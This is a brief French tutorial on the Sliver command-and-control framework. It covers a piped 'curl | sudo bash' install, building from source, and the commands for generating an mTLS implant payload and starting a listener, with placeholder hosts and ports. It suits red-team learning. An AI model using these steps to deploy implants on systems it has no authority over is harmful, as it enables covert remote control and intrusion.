[Réseau] Sliver
Introduction
Sliver C2 est un framework de commande et contrôle qui ressemble un peu à Metasploit.
Il présente des fonctionnalités interéssantes d'obfuscation et des modules permettant de faire de la post-exploitation.
Fonctionnant en mode client-serveur, vous pouvez démarrer un serveur sur un VPS accessible depuis Internet et utiliser le client pour vous connecter sur votre compte d'opérateur, ce qui permet de travailler en équipe.
Vous pouvez aussi travailler directement sur le serveur si vous le souhaitez, ce qui est l'option la plus simple selon moi.
Source
Installation
Linux
Vous pouvez installer Sliver simplement avec la commande suivante pour la plupart des distributions Linux :
curl https://sliver.sh/install | sudo bash
Compiler depuis les sources
Cependant, vous aurez peut-être besoin de compiler vous même, notamment si vous travailler dans des environnement spécifiques tels que Exegol :
git clone https://github.com/BishopFox/sliver.git && cd sliver && git checkout tags/v1.5.39 && make
Manuel
Générer un payload
generate --mtls <LHOST>:<LPORT> --save <FILE_NAME>.exe
Lancer un listener
mtls -l <LPORT>